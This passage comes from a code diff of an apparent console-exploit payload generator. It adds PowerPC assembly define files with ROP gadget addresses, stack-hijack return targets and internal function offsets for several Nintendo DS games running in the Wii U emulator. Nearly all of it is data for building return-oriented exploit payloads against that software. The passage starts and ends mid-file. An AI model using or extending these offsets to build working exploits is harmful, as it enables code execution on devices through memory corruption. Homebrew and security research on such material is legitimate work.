LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205A454)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018B38)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214FA58)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020244B4)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022290AC)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x022294C8)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02228F58)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006E2C)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FF0C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02228B9C)
_START_EXIT equ (RPX_OFFSET + 0x020265DC)

0
brainage_defs.s → payload_generator/defines/brainage_defs.s
View File

39
payload_generator/defines/dkjclimber_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x107969A4-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8C938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x1643F200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022070C4)
BCTRL equ (RPX_OFFSET + 0x02206FFC)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3650)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A327C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA78)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021791A8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B84)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA90)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082F58)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057A10)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492E4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02221A28)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E44)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022218D4)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D8C)
_START_EXIT equ (RPX_OFFSET + 0x02026944)

39
payload_generator/defines/guardiansigns_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079C564-0xC8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C92938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16441D00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0200369C)
BCTRL equ (RPX_OFFSET + 0x020041D8)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020ABF88)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020ABB60)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001AF8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02181AC0)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02281624)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018A88)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B73C8)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F610)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020882E0)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205B0C8)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018B10)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02151BF4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202441C)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0222B2FC)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222B718)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222B1A8)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006E2C)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FE74)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0222ADEC)
_START_EXIT equ (RPX_OFFSET + 0x02026544)

39
payload_generator/defines/kirby_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x10796964-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8C938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x1643F200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
BCTRL equ (RPX_OFFSET + 0x02206FBC)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA50)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492A4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02221894)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D4C)
_START_EXIT equ (RPX_OFFSET + 0x0202693C)

39
payload_generator/defines/kirbymassattack_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079A3E4-0xC0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C90938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16444500)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0204AE04)
BCTRL equ (RPX_OFFSET + 0x02003D2C)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020AA490)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020AA068)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001A8C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217FFE8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227F898)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020187E4)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B58D0)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F358)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020883B0)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205C700)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x0201886C)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02150124)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020241C8)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022296A0)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02229ABC)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222954C)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006B60)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FC30)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02229190)
_START_EXIT equ (RPX_OFFSET + 0x020262EC)

39
payload_generator/defines/mariokartds_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1077870C-0xB0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10A77038)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16229400)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022031F8)
BCTRL equ (RPX_OFFSET + 0x02203130)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A04C8)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A00A0)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02005AB8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02175AE8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022740A8)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02017F88)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AB88C)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200EB28)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020809E4)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02054DCC)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018010)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02145D64)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02023700)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0221E0B8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0221E4D4)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0221DF64)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006944)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201F138)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0221D434)
_START_EXIT equ (RPX_OFFSET + 0x02025F48)

39
payload_generator/defines/masterofdisguise_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B924-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16444200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x020645EC)
BCTRL equ (RPX_OFFSET + 0x02004158)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3F34)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3B0C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179A8C)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02278460)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AF374)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020836A8)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057944)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02149BC8)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02222304)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02222720)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022221B0)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02221670)
_START_EXIT equ (RPX_OFFSET + 0x0202699C)

39
payload_generator/defines/newsmb_eur_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1077860C-0xB0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10A77038)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16229800)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022031F8)
BCTRL equ (RPX_OFFSET + 0x02203130)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A04C8)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A00A0)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02005AB8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02175AE8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022740A8)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02017F88)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AB88C)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200EB28)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020809E4)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02054DCC)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018010)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02145D64)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02023700)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0221E0B8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0221E4D4)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0221DF64)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006944)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201F138)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0221D434)
_START_EXIT equ (RPX_OFFSET + 0x02025F48)

39
payload_generator/defines/partnersintime_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B624-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16444200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022070D8)
BCTRL equ (RPX_OFFSET + 0x02206F94)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3664)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021791BC)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B98)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEAA4)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492F8)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02221A3C)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E58)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022218E8)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
